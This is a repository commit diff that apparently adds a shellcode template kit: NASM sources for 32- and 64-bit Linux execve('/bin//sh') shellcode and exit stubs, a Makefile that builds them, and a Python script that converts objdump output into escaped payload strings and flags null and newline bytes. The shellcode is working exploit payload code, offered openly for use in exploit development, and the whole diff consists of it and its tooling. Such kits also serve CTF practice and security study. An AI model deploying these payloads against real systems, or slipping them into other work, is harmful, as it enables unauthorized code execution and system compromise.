summaryrefslogtreecommitdiffstats
path: root/templates
diff options
context:
space:
mode:
Diffstat (limited to 'templates')
-rw-r--r--templates/shellcode/Makefile17
-rw-r--r--templates/shellcode/exit32.asm8
-rw-r--r--templates/shellcode/exit64.asm8
-rw-r--r--templates/shellcode/shell32.asm14
-rw-r--r--templates/shellcode/shell64.asm15
-rwxr-xr-xtemplates/shellcode/shelltool.py30
6 files changed, 92 insertions, 0 deletions
diff --git a/templates/shellcode/Makefile b/templates/shellcode/Makefile
new file mode 100644
index 0000000..2e67adc
--- /dev/null
+++ b/templates/shellcode/Makefile
@@ -0,0 +1,17 @@
+.PHONY: all
+
+all: shell32.elf shell64.elf
+ @objdump -d shell32.elf | ./shelltool.py
+ @objdump -d shell64.elf | ./shelltool.py
+
+shell32.o: shell32.asm
+ nasm -f elf shell32.asm -o shell32.o
+
+shell32.elf: shell32.o
+ ld -melf_i386 shell32.o -o shell32.elf
+
+shell64.o: shell64.asm
+ nasm -f elf64 shell64.asm -o shell64.o
+
+shell64.elf: shell64.o
+ ld shell64.o -o shell64.elf
diff --git a/templates/shellcode/exit32.asm b/templates/shellcode/exit32.asm
new file mode 100644
index 0000000..559c89c
--- /dev/null
+++ b/templates/shellcode/exit32.asm
@@ -0,0 +1,8 @@
+[SECTION .text]
+global _start
+
+_start:
+ xor ebx, ebx
+ xor eax, eax
+ mov al, 0x1
+ int 0x80
diff --git a/templates/shellcode/exit64.asm b/templates/shellcode/exit64.asm
new file mode 100644
index 0000000..fb899a2
--- /dev/null
+++ b/templates/shellcode/exit64.asm
@@ -0,0 +1,8 @@
+[SECTION .text]
+global _start
+
+_start:
+ xor rdi, rdi
+ mov al, 0x3c
+ cdq
+ syscall
diff --git a/templates/shellcode/shell32.asm b/templates/shellcode/shell32.asm
new file mode 100644
index 0000000..d12910f
--- /dev/null
+++ b/templates/shellcode/shell32.asm
@@ -0,0 +1,14 @@
+[SECTION .text]
+global _start
+
+; https://www.exploit-db.com/shellcodes/46809
+
+_start:
+ xor ecx, ecx
+ push 0xb
+ pop eax
+ push ecx
+ push 0x68732f2f
+ push 0x6e69622f
+ mov ebx, esp
+ int 0x80
diff --git a/templates/shellcode/shell64.asm b/templates/shellcode/shell64.asm
new file mode 100644
index 0000000..a6d4626
--- /dev/null
+++ b/templates/shellcode/shell64.asm
@@ -0,0 +1,15 @@
+[SECTION .text]
+global _start
+
+; https://www.exploit-db.com/shellcodes/47008
+
+_start:
+ xor rsi, rsi
+ push rsi
+ mov rdi, 0x68732f2f6e69622f
+ push rdi
+ push rsp
+ pop rdi
+ mov al, 0x3b
+ cdq
+ syscall
diff --git a/templates/shellcode/shelltool.py b/templates/shellcode/shelltool.py
new file mode 100755
index 0000000..b95a8cd
--- /dev/null
+++ b/templates/shellcode/shelltool.py
@@ -0,0 +1,30 @@
+#!/usr/bin/env python
+
+# This script will convert shellcode disassembly into an escaped string literal
+# and warn about problematic bytes in the payload.
+# objdump -d elf | ./shelltool.py
+
+import sys
+
+name = None
+bytecode = []
+badchars = [ 0x00, 0x0a ]
+
+for line in sys.stdin:
+ for tok in line.split():
+ if name is None:
+ name = tok
+ if len(tok) == 2:
+ try:
+ bytecode.append(int(tok, base=16))
+ except:
+ pass
+
+result = ''.join([ "\\x%02x"%(x) for x in bytecode ])
+result = f'{name}"{result}"'
+
+for x in badchars:
+ if x in bytecode:
+ result += f' **0x{"%02x"%(x)} detected**'
+
+print(result)
cgit-1.2.3-r5 | srcnode v0.4.0